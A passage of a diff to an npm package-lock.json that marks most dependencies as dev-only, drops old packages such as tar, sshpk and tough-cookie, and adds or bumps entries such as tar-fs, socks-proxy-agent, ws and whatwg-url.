"https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", + "dev": true, "dependencies": { "resolve-from": "^5.0.0" }, @@ -3462,6 +3659,7 @@ "version": "5.0.0", "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", + "dev": true, "engines": { "node": ">=8" } @@ -3470,6 +3668,7 @@ "version": "2.0.2", "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", + "dev": true, "engines": { "node": ">=10" } @@ -3480,36 +3679,11 @@ "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==", "dev": true }, - "node_modules/safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/feross" - }, - { - "type": "patreon", - "url": "https://www.patreon.com/feross" - }, - { - "type": "consulting", - "url": "https://feross.org/support" - } - ] - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==", - "dev": true - }, "node_modules/semver": { "version": "6.3.1", "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "dev": true, "bin": { "semver": "bin/semver.js" } @@ -3518,6 +3692,7 @@ "version": "2.0.0", "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "dev": true, "dependencies": { "shebang-regex": "^3.0.0" }, @@ -3529,6 +3704,7 @@ "version": "3.0.0", "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "dev": true, "engines": { "node": ">=8" } @@ -3536,25 +3712,70 @@ "node_modules/signal-exit": { "version": "3.0.7", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==" + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", + "dev": true }, "node_modules/sisteransi": { "version": "1.0.5", "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==" + "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", + "dev": true }, "node_modules/slash": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, "engines": { "node": ">=8" } }, + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 6.0.0", + "npm": ">= 3.0.0" + } + }, + "node_modules/socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", + "dev": true, + "license": "MIT", + "dependencies": { + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" + }, + "engines": { + "node": ">= 10.0.0", + "npm": ">= 3.0.0" + } + }, + "node_modules/socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", + "dev": true, + "license": "MIT", + "dependencies": { + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" + }, + "engines": { + "node": ">= 14" + } + }, "node_modules/source-map": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "dev": true, "engines": { "node": ">=0.10.0" } @@ -3563,6 +3784,7 @@ "version": "0.5.13", "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", + "dev": true, "dependencies": { "buffer-from": "^1.0.0", "source-map": "^0.6.0" @@ -3571,37 +3793,14 @@ "node_modules/sprintf-js": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==" - }, - "node_modules/sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dev": true, - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } + "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", + "dev": true }, "node_modules/stack-utils": { "version": "2.0.6", "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", + "dev": true, "dependencies": { "escape-string-regexp": "^2.0.0" }, @@ -3618,10 +3817,25 @@ "node": ">= 0.10.0" } }, + "node_modules/streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" + }, + "optionalDependencies": { + "bare-events": "^2.2.0" + } + }, "node_modules/string-length": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", + "dev": true, "dependencies": { "char-regex": "^1.0.2", "strip-ansi": "^6.0.0" @@ -3634,6 +3848,7 @@ "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "dev": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", @@ -3647,6 +3862,7 @@ "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "dev": true, "dependencies": { "ansi-regex": "^5.0.1" }, @@ -3658,6 +3874,7 @@ "version": "4.0.0", "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", + "dev": true, "engines": { "node": ">=8" } @@ -3666,6 +3883,7 @@ "version": "2.0.0", "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", + "dev": true, "engines": { "node": ">=6" } @@ -3674,6 +3892,7 @@ "version": "3.1.1", "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", + "dev": true, "engines": { "node": ">=8" }, @@ -3685,6 +3904,7 @@ "version": "7.2.0", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, "dependencies": { "has-flag": "^4.0.0" }, @@ -3696,6 +3916,7 @@ "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", + "dev": true, "engines": { "node": ">= 0.4" }, @@ -3703,33 +3924,38 @@ "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", + "node_modules/tar-fs": { + "version": "3.0.10", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.0.10.tgz", + "integrity": "sha512-C1SwlQGNLe/jPNqapK8epDsXME7CAJR5RL3GcE6KWx1d9OUByzoHVcbu1VPI8tevg9H8Alae0AApHHFGzrD5zA==", "dev": true, + "license": "MIT", "dependencies": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" + "pump": "^3.0.0", + "tar-stream": "^3.1.5" }, - "engines": { - "node": ">=10" + "optionalDependencies": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0" } }, - "node_modules/tar/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true + "node_modules/tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" + } }, "node_modules/test-exclude": { "version": "6.0.0", "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", + "dev": true, "dependencies": { "@istanbuljs/schema": "^0.1.2", "glob": "^7.1.4", @@ -3739,15 +3965,27 @@ "node": ">=8" } }, + "node_modules/text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "b4a": "^1.6.4" + } + }, "node_modules/tmpl": { "version": "1.0.5", "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==" + "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", + "dev": true }, "node_modules/to-regex-range": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", + "dev": true, "dependencies": { "is-number": "^7.0.0" }, @@ -3755,23 +3993,18 @@ "node": ">=8.0" } }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", "dev": true, - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } + "license": "MIT" }, "node_modules/ts-jest": { "version": "29.2.5", "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", + "dev": true, "dependencies": { "bs-logger": "^0.2.6", "ejs": "^3.1.10", @@ -3819,6 +4052,7 @@ "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, "bin": { "semver": "bin/semver.js" }, @@ -3826,34 +4060,11 @@ "node": ">=10" } }, - "node_modules/tslib": { - "version": "2.6.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.0.tgz", - "integrity": "sha512-7At1WUettjcSRHXCyYtTselblcHl9PJFFVKiCAy/bY97+BPZXSQ2wbq0P9s8tK2G7dFQfNnlJnPAiArVBVBsfA==", - "dev": true - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "dev": true, - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==", - "dev": true - }, "node_modules/type-detect": { "version": "4.0.8", "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", + "dev": true, "engines": { "node": ">=4" } @@ -3862,6 +4073,7 @@ "version": "0.21.3", "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", + "dev": true, "engines": { "node": ">=10" }, @@ -3873,6 +4085,7 @@ "version": "5.7.2", "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", + "dev": true, "peer": true, "bin": { "tsc": "bin/tsc", @@ -3883,14 +4096,17 @@ } }, "node_modules/undici-types": { - "version": "6.19.8", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", - "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==" + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "dev": true, + "license": "MIT" }, "node_modules/update-browserslist-db": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", + "dev": true, "funding": [ { "type": "opencollective", @@ -3916,29 +4132,11 @@ "browserslist": ">= 4.21.0" } }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dev": true, - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "dev": true, - "bin": { - "uuid": "bin/uuid" - } - }, "node_modules/v8-to-istanbul": { "version": "9.3.0", "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", + "dev": true, "dependencies": { "@jridgewell/trace-mapping": "^0.3.12", "@types/istanbul-lib-coverage": "^2.0.1", @@ -3948,32 +4146,38 @@ "node": ">=10.12.0" } }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "dev": true, - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, "node_modules/walker": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", + "dev": true, "dependencies": { "makeerror": "1.0.12" } }, + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "dev": true, + "license": "BSD-2-Clause" + }, + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "dev": true, + "license": "MIT", + "dependencies": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, "node_modules/which": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "dev": true, "dependencies": { "isexe": "^2.0.0" }, @@ -3988,6 +4192,7 @@ "version": "7.0.0", "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "dev": true, "dependencies": { "ansi-styles": "^4.0.0", "string-width": "^4.1.0", @@ -4003,12 +4208,14 @@ "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "dev": true }, "node_modules/write-file-atomic": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", + "dev": true, "dependencies": { "imurmurhash": "^0.1.4", "signal-exit": "^3.0.7" @@ -4018,10 +4225,11 @@ } }, "node_modules/ws": { - "version": "8.13.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.13.0.tgz", - "integrity": "sha512-x9vcZYTrFPC7aSIbj7sRCYo7L/Xb8Iy+pW0ng0wt2vCJv7M9HOMy0UoN3rr+IFC7hb7vXoqS+P9ktyLLLhO+LA==", + "version": "8.18.2", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.2.tgz", + "integrity": "sha512-DMricUmwGZUVr++AEAe2uiVM7UoO9MAVZMDu05UQOaUII0lp+zOzLLU4Xqh/JvTqklB1T4uELaaPBKyjE1r4fQ==", "dev": true, + "license": "MIT", "engines": { "node": ">=10.0.0" }, @@ -4042,6 +4250,7 @@ "version": "5.0.8", "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", + "dev": true, "engines": { "node": ">=10" } @@ -4049,12 +4258,14 @@ "node_modules/yallist": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==" + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", + "dev": true }, "node_modules/yargs": { "version": "17.7.2", "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", + "dev": true, "dependencies": { "cliui": "^8.0.1", "escalade": "^3.1.1", @@ -4072,6 +4283,7 @@ "version": "21.1.1", "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", + "dev": true, "engines": { "node": ">=12" } @@ -4080,6 +4292,7 @@ "version": "0.1.0", "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", + "dev": true, "engines": { "node": ">=10" }, @@ -4093,30 +4306,34 @@ "version": "2.2.1", "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "dev": true, "requires": { "@jridgewell/gen-mapping": "^0.3.0", "@jridgewell/trace-mapping": "^0.3.9" } }, "@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": 